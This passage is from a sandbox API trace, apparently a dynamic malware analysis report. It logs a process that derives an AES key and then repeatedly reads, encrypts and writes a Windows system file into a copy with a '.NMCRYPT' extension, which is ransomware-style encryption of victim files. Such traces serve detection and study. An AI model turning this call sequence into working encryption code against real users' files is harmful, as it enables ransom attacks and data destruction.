pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.542] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0160.542] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.542] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad1f8) returned 1 [0160.542] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.542] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.542] wcslen (_String="\\\\?\\") returned 0x4 [0160.542] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad238) returned 1 [0160.542] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.545] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.545] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.545] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.547] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.547] GetLastError () returned 0x0 [0160.547] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.687] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.687] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.687] GetLastError () returned 0x0 [0160.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.687] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.687] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.687] GetLastError () returned 0x0 [0160.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.687] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.687] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.687] GetLastError () returned 0x0 [0160.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.687] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.687] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.687] GetLastError () returned 0x0 [0160.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.688] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.688] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.688] GetLastError () returned 0x0 [0160.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.688] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.688] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.688] GetLastError () returned 0x0 [0160.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.688] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.688] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.688] GetLastError () returned 0x0 [0160.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.688] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.688] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.688] GetLastError () returned 0x0 [0160.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.688] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.688] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.688] GetLastError () returned 0x0 [0160.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.688] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.688] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.688] GetLastError () returned 0x0 [0160.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.688] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.688] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.689] GetLastError () returned 0x0 [0160.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.689] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.689] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.689] GetLastError () returned 0x0 [0160.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.689] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.689] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.689] GetLastError () returned 0x0 [0160.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.689] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.689] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.689] GetLastError () returned 0x0 [0160.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.689] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.689] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.689] GetLastError () returned 0x0 [0160.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.689] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.689] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.689] GetLastError () returned 0x0 [0160.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.689] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.690] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.690] GetLastError () returned 0x0 [0160.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.690] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.690] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.690] GetLastError () returned 0x0 [0160.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.690] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.690] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.690] GetLastError () returned 0x0 [0160.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.690] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.690] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.690] GetLastError () returned 0x0 [0160.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.690] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.690] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.690] GetLastError () returned 0x0 [0160.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.690] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.690] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.690] GetLastError () returned 0x0 [0160.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.690] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.690] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.690] GetLastError () returned 0x0 [0160.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.691] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.691] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.691] GetLastError () returned 0x0 [0160.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.691] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.691] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.691] GetLastError () returned 0x0 [0160.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.691] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.691] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.691] GetLastError () returned 0x0 [0160.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.691] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.691] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.691] GetLastError () returned 0x0 [0160.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.691] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.691] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.691] GetLastError () returned 0x0 [0160.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.691] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.691] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.691] GetLastError () 